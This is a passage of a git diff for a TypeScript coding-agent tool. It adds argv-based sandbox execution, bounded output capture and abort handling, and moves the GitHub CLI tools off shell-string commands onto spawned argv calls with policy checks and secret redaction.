stderrCapture = createOutputCapture(); + + child.stdout?.on("data", (data: Buffer) => { + appendCapturedOutput(stdoutCapture, data, maxBuffer); + }); + child.stderr?.on("data", (data: Buffer) => { + appendCapturedOutput(stderrCapture, data, maxBuffer); + }); + child.on("close", (code) => { + resolve({ + stdout: finalizeCapturedOutput(stdoutCapture), + stderr: finalizeCapturedOutput(stderrCapture), + exitCode: code ?? 1, + }); + }); + child.on("error", (error) => { + const execError = error as Error & { + stdout?: string; + stderr?: string; + }; + execError.stdout = finalizeCapturedOutput(stdoutCapture); + execError.stderr = finalizeCapturedOutput(stderrCapture); + reject(execError); + }); + }); + } catch (error: unknown) { + const execError = error as { + stdout?: string; + stderr?: string; + code?: number | string; + message?: string; + }; + return { + stdout: execError.stdout || "", + stderr: execError.stderr || execError.message || "", + exitCode: typeof execError.code === "number" ? execError.code : 1, + }; + } + } + async readFile(path: string): Promise { const result = await this.exec(`cat "${path}"`); if (result.exitCode !== 0) { diff --git a/src/sandbox/local-sandbox.ts b/src/sandbox/local-sandbox.ts index eeffb4844..e588f83c7 100644 --- a/src/sandbox/local-sandbox.ts +++ b/src/sandbox/local-sandbox.ts @@ -30,20 +30,27 @@ * @module sandbox/local-sandbox */ -import { exec } from "node:child_process"; +import { exec, spawn } from "node:child_process"; import { constants } from "node:fs"; import { access, readFile, writeFile } from "node:fs/promises"; import { promisify } from "node:util"; import { resolveShellEnvironment } from "../utils/shell-env.js"; -import type { ExecResult, Sandbox } from "./types.js"; +import { + appendCapturedOutput, + createOutputCapture, + finalizeCapturedOutput, +} from "./output-capture.js"; +import type { ExecResult, ExecWithArgsOptions, Sandbox } from "./types.js"; const execAsync = promisify(exec); +const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024; export class LocalSandbox implements Sandbox { async exec( command: string, cwd?: string, env?: Record, + signal?: AbortSignal, ): Promise { try { const { stdout, stderr } = await execAsync(command, { @@ -51,6 +58,7 @@ export class LocalSandbox implements Sandbox { env: resolveShellEnvironment(env, { workspaceDir: process.cwd(), }), + signal, }); return { stdout, @@ -71,6 +79,86 @@ export class LocalSandbox implements Sandbox { } } + async execWithArgs( + command: string, + args: string[] = [], + options: ExecWithArgsOptions = {}, + ): Promise { + try { + const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER; + return await new Promise((resolve, reject) => { + const child = spawn(command, args, { + cwd: options.cwd, + detached: true, + env: resolveShellEnvironment(options.env, { + workspaceDir: process.cwd(), + }), + stdio: ["ignore", "pipe", "pipe"], + }); + const stdoutCapture = createOutputCapture(); + const stderrCapture = createOutputCapture(); + const killChildTree = (): void => { + if (child.pid !== undefined) { + try { + process.kill(-child.pid, "SIGTERM"); + return; + } catch { + // Fall back for platforms without process groups. + } + } + child.kill("SIGTERM"); + }; + const cleanupAbort = (): void => { + options.signal?.removeEventListener("abort", killChildTree); + }; + options.signal?.addEventListener("abort", killChildTree, { + once: true, + }); + if (options.signal?.aborted) { + killChildTree(); + } + + child.stdout?.on("data", (data) => { + appendCapturedOutput(stdoutCapture, Buffer.from(data), maxBuffer); + }); + child.stderr?.on("data", (data) => { + appendCapturedOutput(stderrCapture, Buffer.from(data), maxBuffer); + }); + child.on("close", (code) => { + cleanupAbort(); + resolve({ + stdout: finalizeCapturedOutput(stdoutCapture), + stderr: finalizeCapturedOutput(stderrCapture), + exitCode: code ?? 1, + }); + }); + child.on("error", (error) => { + cleanupAbort(); + const execError = error as Error & { + stdout?: string; + stderr?: string; + }; + execError.stdout = finalizeCapturedOutput(stdoutCapture); + execError.stderr = + finalizeCapturedOutput(stderrCapture) || execError.message; + reject(execError); + }); + }); + } catch (error: unknown) { + const execError = error as { + stdout?: string; + stderr?: string; + message?: string; + code?: number | string; + }; + return { + stdout: execError.stdout || "", + stderr: execError.stderr || execError.message || "", + exitCode: typeof execError.code === "number" ? execError.code : 1, + }; + } + } + async readFile(path: string): Promise { return readFile(path, "utf-8"); } diff --git a/src/sandbox/native-sandbox.ts b/src/sandbox/native-sandbox.ts index c07cadc42..73aa2db3a 100644 --- a/src/sandbox/native-sandbox.ts +++ b/src/sandbox/native-sandbox.ts @@ -31,9 +31,15 @@ import { fileURLToPath } from "node:url"; import { promisify } from "node:util"; import { isPathWithin } from "../utils/path-containment.js"; import { resolveShellEnvironment } from "../utils/shell-env.js"; +import { + appendCapturedOutput, + createOutputCapture, + finalizeCapturedOutput, +} from "./output-capture.js"; import type { ExecResult, Sandbox } from "./types.js"; const _execAsync = promisify(exec); +const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024; // ───────────────────────────────────────────────────────────── // Sandbox Policy Types @@ -563,6 +569,7 @@ export class NativeSandbox implements Sandbox { command: string, cwd?: string, env?: Record, + signal?: AbortSignal, ): Promise { const workingDir = this.resolveWorkingDir(cwd); this.assertExecutionCwd(workingDir); @@ -587,6 +594,7 @@ export class NativeSandbox implements Sandbox { child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, { cwd: workingDir, env: mergedEnv, + signal, }); } else if (platform() === "linux") { reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE)); @@ -618,7 +626,7 @@ export class NativeSandbox implements Sandbox { resolve({ stdout, stderr, - exitCode: code ?? 0, + exitCode: code ?? 1, }); }); @@ -635,71 +643,93 @@ export class NativeSandbox implements Sandbox { async execWithArgs( command: string, args: string[] = [], - options: SpawnOptions = {}, + options: SpawnOptions & { maxBuffer?: number } = {}, ): Promise { - const fullCommand = [command, ...args]; - const workingDir = this.resolveWorkingDir(options.cwd); - this.assertExecutionCwd(workingDir); - const mergedOptions: SpawnOptions = { - ...options, - cwd: workingDir, - env: { - ...resolveShellEnvironment(options.env, { - workspaceDir: this.cwd, - }), - [SANDBOX_ENV_VAR]: this.getSandboxType(), - }, - }; - - return new Promise((resolve, reject) => { - let child: ChildProcess; - - if (platform() === "darwin") { - const seatbeltArgs = createSeatbeltArgs( - fullCommand, - this.policy, - this.cwd, - ); - child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, mergedOptions); - } else if (platform() === "linux") { - reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE)); - return; - } else { - reject( - new Error( - `Native sandbox is not supported on platform ${platform()}. Refusing to run unsandboxed.`, - ), - ); - return; - } + try { + const { maxBuffer = EXEC_WITH_ARGS_MAX_BUFFER, ...spawnOptions } = + options; + const fullCommand = [command, ...args]; + const workingDir = this.resolveWorkingDir(spawnOptions.cwd); + this.assertExecutionCwd(workingDir); + const mergedOptions: SpawnOptions = { + ...spawnOptions, + cwd: workingDir, + env: { + ...resolveShellEnvironment(spawnOptions.env, { + workspaceDir: this.cwd, + }), + [SANDBOX_ENV_VAR]: this.getSandboxType(), + }, + }; + + return await new Promise((resolve, reject) => { + let child: ChildProcess; + + if (platform() === "darwin") { + const seatbeltArgs = createSeatbeltArgs( + fullCommand, + this.policy, + this.cwd, + ); + child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, mergedOptions); + } else if (platform() === "linux") { + reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE)); + return; + } else { + reject( + new Error( + `Native sandbox is not supported on platform ${platform()}. Refusing to run unsandboxed.`, + ), + ); + return; + } - this.activeProcesses.add(child); + this.activeProcesses.add(child); - let stdout = ""; - let stderr = ""; + const stdoutCapture = createOutputCapture(); + const stderrCapture = createOutputCapture(); - child.stdout?.on("data", (data: Buffer) => { - stdout += data.toString(); - }); + child.stdout?.on("data", (data: Buffer) => { + appendCapturedOutput(stdoutCapture, data, maxBuffer); + }); - child.stderr?.on("data", (data: Buffer) => { - stderr += data.toString(); - }); + child.stderr?.on("data", (data: Buffer) => { + appendCapturedOutput(stderrCapture, data, maxBuffer); + }); - child.on("close", (code) => { - this.activeProcesses.delete(child); - resolve({ - stdout, - stderr, - exitCode: code ?? 0, + child.on("close", (code) => { + this.activeProcesses.delete(child); + resolve({ + stdout: finalizeCapturedOutput(stdoutCapture), + stderr: finalizeCapturedOutput(stderrCapture), + exitCode: code ?? 1, + }); }); - }); - child.on("error", (error) => { - this.activeProcesses.delete(child); - reject(error); + child.on("error", (error) => { + this.activeProcesses.delete(child); + const execError = error as Error & { + stdout?: string; + stderr?: string; + }; + execError.stdout = finalizeCapturedOutput(stdoutCapture); + execError.stderr = finalizeCapturedOutput(stderrCapture); + reject(execError); + }); }); - }); + } catch (error: unknown) { + const execError = error as { + stdout?: string; + stderr?: string; + code?: number | string; + message?: string; + }; + return { + stdout: execError.stdout || "", + stderr: execError.stderr || execError.message || "", + exitCode: typeof execError.code === "number" ? execError.code : 1, + }; + } } /** diff --git a/src/sandbox/output-capture.ts b/src/sandbox/output-capture.ts new file mode 100644 index 000000000..ad08728d9 --- /dev/null +++ b/src/sandbox/output-capture.ts @@ -0,0 +1,36 @@ +import { StringDecoder } from "node:string_decoder"; + +type OutputCapture = { + text: string; + bytes: number; + decoder: StringDecoder; +}; + +export function createOutputCapture(): OutputCapture { + return { + text: "", + bytes: 0, + decoder: new StringDecoder("utf8"), + }; +} + +export function appendCapturedOutput( + capture: OutputCapture, + data: Buffer, + maxBuffer: number, +): void { + if (capture.bytes >= maxBuffer) { + return; + } + + const remainingBytes = maxBuffer - capture.bytes; + const chunk = + data.length <= remainingBytes ? data : data.subarray(0, remainingBytes); + capture.text += capture.decoder.write(chunk); + capture.bytes += chunk.length; +} + +export function finalizeCapturedOutput(capture: OutputCapture): string { + capture.text += capture.decoder.end(); + return capture.text; +} diff --git a/src/sandbox/types.ts b/src/sandbox/types.ts index d6abdcb65..65b02a807 100644 --- a/src/sandbox/types.ts +++ b/src/sandbox/types.ts @@ -4,17 +4,36 @@ export interface ExecResult { exitCode: number; } +export interface ExecWithArgsOptions { + cwd?: string; + env?: Record; + maxBuffer?: number; + signal?: AbortSignal; +} + export interface Sandbox { /** * Execute a command in the sandbox. * @param command The command string to execute * @param cwd The working directory relative to the sandbox root (or absolute if allowed) * @param env Environment variables to set + * @param signal AbortSignal used to cancel execution */ exec( command: string, cwd?: string, env?: Record, + signal?: AbortSignal, + ): Promise; + + /** + * Execute a command with argv in the sandbox, when supported. + * This avoids shell interpretation of untrusted arguments. + */ + execWithArgs?( + command: string, + args?: string[], + options?: ExecWithArgsOptions, ): Promise; /** diff --git a/src/tools/bash.ts b/src/tools/bash.ts index 8b759c314..61fa5e4fd 100644 --- a/src/tools/bash.ts +++ b/src/tools/bash.ts @@ -285,7 +285,7 @@ Timeout: 90s default, 600s max. Output truncates at 40KB.`, // ============================================ if (sandbox) { // Execute in isolated sandbox environment (e.g., Docker container) - const result = await sandbox.exec(interpolatedCommand, cwd, env); + const result = await sandbox.exec(interpolatedCommand, cwd, env, signal); // Combine stdout and stderr for output let output = ""; diff --git a/src/tools/gh-helpers.ts b/src/tools/gh-helpers.ts index b1831b0ef..584845af0 100644 --- a/src/tools/gh-helpers.ts +++ b/src/tools/gh-helpers.ts @@ -1,31 +1,92 @@ +import { spawn } from "node:child_process"; +import { StringDecoder } from "node:string_decoder"; import type { AgentToolResult } from "../agent/types.js"; +import { checkCommand } from "../safety/execpolicy.js"; +import { requirePlanCheck } from "../safety/safe-mode.js"; +import type { Sandbox } from "../sandbox/types.js"; +import { sanitizeWithStaticMask } from "../utils/secret-redactor.js"; +import { resolveShellEnvironment } from "../utils/shell-env.js"; import { type BashBackgroundDetails, bashTool } from "./bash.js"; +import { killProcessTree } from "./shell-utils.js"; -/** - * Check if GitHub CLI is installed and authenticated. - * Returns an error result if not available, otherwise returns null. - */ -export async function checkGhCliAvailable( - signal?: AbortSignal, -): Promise | null> { - // Check if gh CLI is installed - const checkResult = await bashTool.execute( - "gh-check", - { command: "which gh" }, - signal, - ); +const GH_TIMEOUT_MS = 90_000; +const GH_MAX_BUFFER = 40 * 1024; +const GH_SANDBOX_MAX_BUFFER = GH_MAX_BUFFER + 1; - const checkContent = checkResult.content[0]; - if ( - checkContent && - "text" in checkContent && - checkContent.text.includes("Command failed") - ) { - return { - content: [ - { - type: "text", - text: `GitHub CLI (gh) is not installed. +type OutputCapture = { + text: string; + bytes: number; + truncated: boolean; + decoder: StringDecoder; +}; + +function createOutputCapture(): OutputCapture { + return { + text: "", + bytes: 0, + truncated: false, + decoder: new StringDecoder("utf8"), + }; +} + +function appendCapturedOutput(capture: OutputCapture, data: Buffer): void { + if (capture.bytes >= GH_MAX_BUFFER) { + capture.truncated = true; + return; + } + + const remainingBytes = GH_MAX_BUFFER - capture.bytes; + if (data.length <= remainingBytes) { + capture.text += capture.decoder.write(data); + capture.bytes += data.length; + return; + } + + capture.text += capture.decoder.write(data.subarray(0, remainingBytes)); + capture.bytes = GH_MAX_BUFFER; + capture.truncated = true; +} + +function finalizeCapturedOutput(capture: OutputCapture): string { + if (!capture.truncated) { + capture.text += capture.decoder.end(); + } + return capture.text; +} + +function quotePolicyArg(value: string): string { + if (/^[A-Za-z0-9_./:=@%+,-]+$/u.test(value)) { + return value; + } + return `'${value.replace(/'/g, `'\\''`)}'`; +} + +function buildGhPolicyCommand(args: string[]): string { + return ["gh", ...args].map(quotePolicyArg).join(" "); +} + +function isMutatingGhCommand(args: string[]): boolean { + const [resource, action] = args; + if (resource === "pr") { + return action === "create" || action === "checkout" || action === "comment"; + } + if (resource === "issue") { + return action === "create" || action === "comment" || action === "close"; + } + if (resource === "repo") { + return action === "clone" || action === "fork"; + } + return false; +} + +function ghCliNotInstalledResult(): AgentToolResult< + BashBackgroundDetails | undefined +> { + return { + content: [ + { + type: "text", + text: `GitHub CLI (gh) is not installed. Install it with: macOS: brew install gh @@ -33,21 +94,313 @@ Install it with: Windows: See https://cli.github.com After installing, authenticate with: gh auth login`, - }, - ], - details: undefined, - }; + }, + ], + isError: true, + details: undefined, + }; +} + +function sandboxRequiresArgvResult(): AgentToolResult< + BashBackgroundDetails | undefined +> { + return { + content: [ + { + type: "text", + text: "Sandbox gh checks require argv-capable sandbox support.", + }, + ], + isError: true, + details: undefined, + }; +} +function sandboxGhProbeFailureResult( + text: string, +): AgentToolResult | null { + if ( + !text.includes("Command timed out") && + !text.includes("Command cancelled") && + !text.includes("Daytona session command timed out") + ) { + return null; } + return { + content: [ + { + type: "text", + text: sanitizeWithStaticMask(text).trim(), + }, + ], + isError: true, + details: undefined, + }; +} + +function sandboxGhProbeLooksLikeMissingGh(text: string): boolean { + const normalizedText = text.toLowerCase(); + return ( + normalizedText.includes("gh: command not found") || + normalizedText.includes( + "gh is not recognized as an internal or external command", + ) || + normalizedText.includes( + "'gh' is not recognized as an internal or external command", + ) || + normalizedText.includes( + '"gh" is not recognized as an internal or external command', + ) || + normalizedText.includes("spawn gh enoent") || + normalizedText.includes("exec: gh: executable file not found") || + normalizedText.includes('exec: "gh": executable file not found') || + normalizedText.includes("exec: 'gh': executable file not found") + ); +} + +function sandboxGhAvailabilityFailureResult( + text: string, +): AgentToolResult { + return { + content: [ + { + type: "text", + text: `GitHub CLI availability check failed. + +Original error: +${sanitizeWithStaticMask(text).trim() || "Unknown sandbox gh probe failure"}`, + }, + ], + isError: true, + details: undefined, + }; +} - // Check if authenticated by running a simple gh command - const authCheck = await bashTool.execute( - "gh-auth-check", - { command: "gh auth status" }, - signal, +function sandboxGhProbeLooksLikeAuthIssue(text: string): boolean { + const normalizedText = text.toLowerCase(); + return ( + normalizedText.includes("http 401") || + normalizedText.includes("http 403") || + normalizedText.includes("bad credentials") || + normalizedText.includes("authentication failed") || + normalizedText.includes("invalid token") || + normalizedText.includes("token is no longer valid") || + normalizedText.includes("token has expired") ); +} + +function sandboxGhAuthenticationFailureResult( + text: string, +): AgentToolResult { + return { + content: [ + { + type: "text", + text: `GitHub CLI authentication check failed. + +Original error: +${sanitizeWithStaticMask(text).trim() || "Unknown sandbox gh auth probe failure"}`, + }, + ], + isError: true, + details: undefined, + }; +} + +function combineAbortSignals(signals: AbortSignal[]): { + signal: AbortSignal; + cleanup: () => void; +} { + const controller = new AbortController(); + const listeners: Array<{ signal: AbortSignal; listener: () => void }> = []; + const abortFrom = (signal: AbortSignal) => { + if (!controller.signal.aborted) { + controller.abort(signal.reason); + } + }; + + for (const signal of signals) { + if (signal.aborted) { + abortFrom(signal); + break; + } + const listener = () => abortFrom(signal); + listeners.push({ signal, listener }); + signal.addEventListener("abort", listener, { once: true }); + } + + return { + signal: controller.signal, + cleanup: () => { + for (const { signal, listener } of listeners) { + signal.removeEventListener("abort", listener); + } + }, + }; +} + +async function runSandboxGhProbe( + sandbox: Sandbox, + args: string[], + env: Record, + signal?: AbortSignal, +): Promise<{ isError: boolean; text: string } | null> { + if (!sandbox.execWithArgs) { + return null; + } + if (signal?.aborted) { + return { + isError: true, + text: "Command cancelled", + }; + } + + const timeoutController = new AbortController(); + let timedOut = false; + const timeoutHandle = setTimeout(() => { + timedOut = true; + timeoutController.abort(); + }, GH_TIMEOUT_MS); + const combinedSignal = signal + ? combineAbortSignals([signal, timeoutController.signal]) + : { signal: timeoutController.signal, cleanup: () => {} }; + let abortProbe: (() => void) | undefined; + + try { + const probeAbortPromise = new Promise((_, reject) => { + abortProbe = () => reject(new Error("Sandbox gh probe aborted")); + if (combinedSignal.signal.aborted) { + abortProbe(); + return; + } + combinedSignal.signal.addEventListener("abort", abortProbe, { + once: true, + }); + }); + const result = await Promise.race([ + sandbox.execWithArgs("gh", args, { + env, + maxBuffer: GH_SANDBOX_MAX_BUFFER, + signal: combinedSignal.signal, + }), + probeAbortPromise, + ]); + const messages = [result.stdout, result.stderr].filter(Boolean); + if (signal?.aborted) { + messages.push("Command cancelled"); + } else if (timedOut) { + messages.push(`Command timed out after ${GH_TIMEOUT_MS / 1000}s`); + } + return { + isError: timedOut || signal?.aborted || result.exitCode !== 0, + text: messages.join("\n"), + }; + } catch (error) { + if (signal?.aborted) { + return { + isError: true, + text: "Command cancelled", + }; + } + if (timedOut) { + return { + isError: true, + text: `Command timed out after ${GH_TIMEOUT_MS / 1000}s`, + }; + } + throw error; + } finally { + clearTimeout(timeoutHandle); + if (abortProbe) { + combinedSignal.signal.removeEventListener("abort", abortProbe); + } + combinedSignal.cleanup(); + } +} + +/** + * Check if GitHub CLI is installed and authenticated. + * Returns an error result if not available, otherwise returns null. + */ +export async function checkGhCliAvailable( + signal?: AbortSignal, + sandbox?: Sandbox, +): Promise | null> { + const sandboxEnv = sandbox + ? resolveShellEnvironment(undefined, { workspaceDir: process.cwd() }) + : undefined; + + if (sandbox) { + const checkResult = await runSandboxGhProbe( + sandbox, + ["--version"], + sandboxEnv ?? {}, + signal, + ); + if (!checkResult) { + return sandboxRequiresArgvResult(); + } + if (checkResult.isError) { + const probeFailure = sandboxGhProbeFailureResult(checkResult.text); + if (probeFailure) { + return probeFailure; + } + if (sandboxGhProbeLooksLikeMissingGh(checkResult.text)) { + return ghCliNotInstalledResult(); + } + return sandboxGhAvailabilityFailureResult(checkResult.text); + } + } else { + // Check if gh CLI is installed + const checkResult = await bashTool.execute( + "gh-check", + { command: "which gh" }, + signal, + ); + + const checkContent = checkResult.content[0]; + const checkText = + checkContent && "text" in checkContent ? checkContent.text : ""; + if ( + checkResult.isError || + checkText.includes("Command failed") || + checkText.includes("Exit code:") + ) { + return ghCliNotInstalledResult(); + } + } + + let authText = ""; + let sandboxAuthProbeErrored = false; + if (sandbox) { + const authCheck = await runSandboxGhProbe( + sandbox, + ["auth", "status"], + sandboxEnv ?? {}, + signal, + ); + if (!authCheck) { + return sandboxRequiresArgvResult(); + } + sandboxAuthProbeErrored = authCheck.isError; + if (sandboxAuthProbeErrored) { + const probeFailure = sandboxGhProbeFailureResult(authCheck.text); + if (probeFailure) { + return probeFailure; + } + } + authText = authCheck.text; + } else { + // Check if authenticated by running a simple gh command + const authCheck = await bashTool.execute( + "gh-auth-check", + { command: "gh auth status" }, + signal, + ); + + const authContent = authCheck.content[0]; + authText = authContent && "text" in authContent ? authContent.text : ""; + } - const authContent = authCheck.content[0]; - const authText = authContent && "text" in authContent ? authContent.text : ""; if ( authText.includes("not logged in") || authText.includes("gh auth login") || @@ -65,10 +418,18 @@ This will open a browser to authenticate with GitHub. You can also use a personal access token: gh auth login --with-token`, }, ], + isError: true, details: undefined, }; } + if (sandboxAuthProbeErrored) { + if (!sandboxGhProbeLooksLikeAuthIssue(authText)) { + return sandboxGhAvailabilityFailureResult(authText); + } + return sandboxGhAuthenticationFailureResult(authText); + } + return null; // All checks passed } @@ -77,10 +438,11 @@ You can also use a personal access token: gh auth login --with-token`, */ export async function executeGhCommand( toolCallId: string, - command: string, + args: string[], signal?: AbortSignal, + sandbox?: Sandbox, ): Promise> { - const result = await bashTool.execute(toolCallId, { command }, signal); + const result = await executeGhArgv(toolCallId, args, signal, sandbox); const resultContent = result.content[0]; const text = @@ -100,6 +462,7 @@ Original error: ${text}`, }, ], + isError: result.isError, details: undefined, }; } @@ -118,6 +481,7 @@ Original error: ${text}`, }, ], + isError: result.isError, details: undefined, }; } @@ -138,9 +502,312 @@ Original error: ${text}`, }, ], + isError: result.isError, details: undefined, }; } return result; } + +async function executeGhArgv( + _toolCallId: string, + args: string[], + signal?: AbortSignal, + sandbox?: Sandbox, +): Promise> { + const policyCommand = buildGhPolicyCommand(args); + const policyResult = checkCommand(policyCommand, process.cwd()); + if (policyResult.decision === "forbidden") { + const matchInfo = policyResult.matchedRules + .map((rule) => + rule.type === "prefix" + ? `prefix: ${rule.matchedPrefix.join(" ")}` + : `heuristic: ${rule.command.join(" ")}`, + ) + .join(", "); + return { + content: [ + { + type: "text", + text: `Command blocked by execpolicy: ${policyCommand}\n\nDecision: forbidden\nMatched rules: ${matchInfo || "none"}\n\nTo allow this command, add a prefix_rule to .maestro/execpolicy`, + }, + ], + isError: true, + details: undefined, + }; + } + + if (isMutatingGhCommand(args)) { + requirePlanCheck("gh"); + } + + if (signal?.aborted) { + throw new Error("GitHub CLI command aborted before start"); + } + + if (sandbox) { + return executeGhInSandbox(policyCommand, args, sandbox, signal); + } + + return new Promise((resolve, reject) => { + const child = spawn("gh", args, { + stdio: ["ignore", "pipe", "pipe"], + shell: false, + detached: true, + env: resolveShellEnvironment(undefined, { + workspaceDir: process.cwd(), + }), + ...(signal ? { signal } : {}), + }); + const stdoutCapture = createOutputCapture(); + const stderrCapture = createOutputCapture(); + let timedOut = false; + let aborted = false; + const buildResult = ( + exitCode?: number | null, + ): AgentToolResult => { + let output = finalizeCapturedOutput(stdoutCapture); + const stderr = finalizeCapturedOutput(stderrCapture); + if (stderr) { + if (output) output += "\n"; + output += stderr; + } + const truncationMessages: string[] = []; + if (stdoutCapture.truncated) { + const displayedKB = Math.round(GH_MAX_BUFFER / 1024); + truncationMessages.push( + `stdout exceeded ${displayedKB}KB limit and was truncated`, + ); + } + if (stderrCapture.truncated) { + const displayedKB = Math.round(GH_MAX_BUFFER / 1024); + truncationMessages.push( + `stderr exceeded ${displayedKB}KB limit and was truncated`, + ); + } + if (truncationMessages.length > 0) { + output += `\n\n⚠️ Output truncated: ${truncationMessages.join("; ")}. Consider narrowing the gh query or requesting fewer fields.`; + } + if (timedOut) { + output += `\n\n⏱️ Command timed out after ${GH_TIMEOUT_MS / 1000}s`; + } else if (aborted) { + output += "\n\nCommand cancelled"; + } else if (exitCode !== 0) { + output += `\n\nExit code: ${exitCode}`; + } + + return { + content: [ + { + type: "text", + text: + sanitizeWithStaticMask(output).trim() || + "Command executed successfully (no output)", + }, + ], + isError: timedOut || aborted || exitCode !== 0, + details: undefined, + }; + }; + + const onAbort = () => { + if (child.pid) { + killProcessTree(child.pid); + return; + } + child.kill("SIGTERM"); + }; + const onSignalAbort = () => { + aborted = true; + onAbort(); + }; + const timeoutHandle = setTimeout(() => { + timedOut = true; + onAbort(); + }, GH_TIMEOUT_MS); + const cleanup = () => { + clearTimeout(timeoutHandle); + if (signal) { + signal.removeEventListener("abort", onSignalAbort); + } + }; + if (signal) { + signal.addEventListener("abort", onSignalAbort, { once: true }); + if (signal.aborted) { + onSignalAbort(); + } + } + + child.stdout?.on("data", (data) => { + appendCapturedOutput(stdoutCapture, Buffer.from(data)); + }); + child.stderr?.on("data", (data) => { + appendCapturedOutput(stderrCapture, Buffer.from(data)); + }); + child.on("error", (error) => { + cleanup(); + if ((error as { code?: string }).code === "ENOENT") { + resolve(ghCliNotInstalledResult()); + return; + } + if (signal?.aborted || aborted) { + aborted = true; + resolve(buildResult()); + return; + } + reject(error); + }); + child.on("close", (code) => { + cleanup(); + resolve(buildResult(code)); + }); + }); +} + +async function executeGhInSandbox( + command: string, + args: string[], + sandbox: Sandbox, + signal?: AbortSignal, +): Promise> { + const stdoutCapture = createOutputCapture(); + const stderrCapture = createOutputCapture(); + let timedOut = false; + let aborted = false; + + const buildResult = (exitCode?: number) => { + if (signal?.aborted) { + aborted = true; + } + let output = finalizeCapturedOutput(stdoutCapture); + const stderr = finalizeCapturedOutput(stderrCapture); + if (stderr) { + if (output) output += "\n"; + output += stderr; + } + const truncationMessages: string[] = []; + if (stdoutCapture.truncated) { + const displayedKB = Math.round(GH_MAX_BUFFER / 1024); + truncationMessages.push( + `stdout exceeded ${displayedKB}KB limit and was truncated`, + ); + } + if (stderrCapture.truncated) { + const displayedKB = Math.round(GH_MAX_BUFFER / 1024); + truncationMessages.push( + `stderr exceeded ${displayedKB}KB limit and was truncated`, + ); + } + if (truncationMessages.length > 0) { + output += `\n\n⚠️ Output truncated: ${truncationMessages.join("; ")}. Consider narrowing the gh query or requesting fewer fields.`; + } + if (timedOut) { + output += `\n\n⏱️ Command timed out after ${GH_TIMEOUT_MS / 1000}s`; + } else if (aborted) { + output += "\n\nCommand cancelled"; + } else if (exitCode !== undefined && exitCode !== 0) { + output += `\n\nExit code: ${exitCode}`; + } + + return { + content: [ + { + type: "text" as const, + text: + sanitizeWithStaticMask(output).trim() || + "Command executed successfully (no output)", + }, + ], + isError: + timedOut || aborted || (exitCode !== undefined && exitCode !== 0), + details: undefined, + }; + }; + + const timeoutController = new AbortController(); + const timeoutHandle = setTimeout(() => { + timedOut = true; + timeoutController.abort(); + }, GH_TIMEOUT_MS); + const onSignalAbort = () => { + aborted = true; + }; + if (signal) { + signal.addEventListener("abort", onSignalAbort, { once: true }); + if (signal.aborted) { + onSignalAbort(); + } + } + let cleanupCombinedSignal = () => {}; + let combinedSandboxSignal: AbortSignal | undefined; + let abortExec: (() => void) | undefined; + + try { + const env = resolveShellEnvironment(undefined, { + workspaceDir: process.cwd(), + }); + if (!sandbox.execWithArgs) { + return { + content: [ + { + type: "text", + text: "Sandbox gh execution requires argv-capable sandbox support.", + }, + ], + isError: true, + details: undefined, + }; + } + const combinedSignal = signal + ? combineAbortSignals([signal, timeoutController.signal]) + : { signal: timeoutController.signal, cleanup: () => {} }; + combinedSandboxSignal = combinedSignal.signal; + cleanupCombinedSignal = combinedSignal.cleanup; + const execAbortPromise = new Promise((_, reject) => { + abortExec = () => reject(new Error("Sandbox gh command aborted")); + if (aborted || combinedSignal.signal.aborted) { + abortExec(); + return; + } + combinedSignal.signal.addEventListener("abort", abortExec, { + once: true, + }); + }); + const result = await Promise.race([ + sandbox.execWithArgs("gh", args, { + env, + maxBuffer: GH_SANDBOX_MAX_BUFFER, + signal: combinedSignal.signal, + }), + execAbortPromise, + ]); + appendCapturedOutput(stdoutCapture, Buffer.from(result.stdout)); + appendCapturedOutput(stderrCapture, Buffer.from(result.stderr)); + return buildResult(result.exitCode); + } catch (error) { + const execError = error as { + stdout?: string | Buffer; + stderr?: string | Buffer; + }; + if (typeof execError.stdout === "string") { + appendCapturedOutput(stdoutCapture, Buffer.from(execError.stdout)); + } + if (typeof execError.stderr === "string") { + appendCapturedOutput(stderrCapture, Buffer.from(execError.stderr)); + } + if (timedOut || aborted) { + return buildResult(); + } + throw error; + } finally { + clearTimeout(timeoutHandle); + if (abortExec && combinedSandboxSignal) { + combinedSandboxSignal.removeEventListener("abort", abortExec); + } + cleanupCombinedSignal(); + if (signal) { + signal.removeEventListener("abort", onSignalAbort); + } + } +} diff --git a/src/tools/gh.ts b/src/tools/gh.ts index dec4605b3..df16b7d1e 100644 --- a/src/tools/gh.ts +++ b/src/tools/gh.ts @@ -76,8 +76,8 @@ Examples: maxRetries: 2, retryDelayMs: 1000, shouldRetry: isGhRetryable, - async run(params, { signal, respond }) { - const check = await checkGhCliAvailable(signal); + async run(params, { signal, respond, sandbox }) { + const check = await checkGhCliAvailable(signal, sandbox); if (check) return check; const args: string[] = ["pr", params.action]; @@ -126,8 +126,7 @@ Examples: if (params.nameOnly) args.push("--name-only"); } - const cmd = `gh ${args.map((a) => `"${a.replace(/"/g, '\\"')}"`).join(" ")}`; - return executeGhCommand(`gh-pr-${params.action}`, cmd, signal); + return executeGhCommand(`gh-pr-${params.action}`, args, signal, sandbox); }, }); @@ -180,8 +179,8 @@ Examples: maxRetries: 2, retryDelayMs: 1000, shouldRetry: isGhRetryable, - async run(params, { signal }) { - const check = await checkGhCliAvailable(signal); + async run(params, { signal, sandbox }) { + const check = await checkGhCliAvailable(signal, sandbox); if (check) return check; const args: string[] = ["issue", params.action]; @@ -211,8 +210,7 @@ Examples: args.push(String(params.number)); } - const cmd = `gh ${args.map((a) => `"${a.replace(/"/g, '\\"')}"`).join(" ")}`; - return executeGhCommand(`gh-issue-${params.action}`, cmd, signal); + return executeGhCommand(`gh-issue-${params.action}`, args, signal, sandbox); }, }); @@ -249,8 +247,8 @@ Examples: maxRetries: 2, retryDelayMs: 1000, shouldRetry: isGhRetryable, - async run(params, { signal }) { - const check = await checkGhCliAvailable(signal); + async run(params, { signal, sandbox }) { + const check = await checkGhCliAvailable(signal, sandbox); if (check) return check; const args: string[] = ["repo", params.action]; @@ -266,7 +264,6 @@ Examples: } // fork has no additional params - const cmd = `gh ${args.map((a) => 